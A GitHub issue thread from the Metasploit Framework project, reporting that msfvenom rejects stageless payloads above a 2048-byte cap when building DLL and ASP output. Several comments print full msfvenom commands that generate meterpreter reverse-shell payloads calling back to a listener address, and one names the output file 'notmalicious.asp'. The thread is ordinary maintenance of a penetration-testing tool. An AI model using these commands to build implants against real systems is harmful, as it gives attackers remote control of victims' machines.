### ISSUE TITLE
Update Msf::Util::EXE to handle stageless payloads

### ISSUE THREAD

**Issue by wvu** [rapid7/metasploit-framework#11676]
When generating a DLL with `msfvenom`, stageless payloads are "too big."

Example from @rwhitcroft:

```
wvu@kharak:/rapid7/metasploit-framework:master$ ./msfvenom -p windows/meterpreter_reverse_http -f dll -o ~/http.dll LHOST=10.10.10.10 LPORT=80
/Users/wvu/.rbenv/versions/2.6.2/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 180825 bytes
Error: The EXE generator now has a max size of 2048 bytes, please fix the calling module
wvu@kharak:/rapid7/metasploit-framework:master$
```

Updating the 2048-byte cap (https://github.com/rapid7/metasploit-framework/commit/b3e36e5692ffd4e904adcdbb456a567f82d3b503?) might be sufficient. It has worked in my testing.

ETA: It was increased to 4096 in #14410 (https://github.com/rapid7/metasploit-framework/pull/14410/commits/3586644b62a722254d00dacbccbf7ee136d95d71).

**Comment by rwhitcroft** [comment]
Just to add some info... I'm trying to do something like this, but ideally not like this:

https://github.com/rapid7/metasploit-framework/blob/ced68536ab9c40be59b4c14b6dd25b94a3143464/lib/msf/core/handler/reverse_http.rb#L377-L378

With this line in between the two above:
`File.open('/tmp/dll', 'wb') { |f| f << blob }`

**Comment by caseygoodrich** [comment]
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=4448 -f dll > dns.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Error: The EXE generator now has a max size of 2048 bytes, please fix the calling module

**Comment by wvu-r7** [comment]
I forgot about this. I think I can make the update and call it good.

**Comment by wvu-r7** [comment]
Someone else will have to do this.

**Comment by TechnicalSecuritySolutions** [comment]
Same issue, however it happens when compiling an asp payload. Note this states the payload was an EXE:

msf6 exploit(multi/handler) > msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4447 -f asp > notmalicious.asp
[*] exec: msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4447 -f asp > notmalicious.asp

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Error: The **EXE** generator now has a max size of 2048 bytes, please fix the calling module

**Comment by wvu** [comment]
#17594
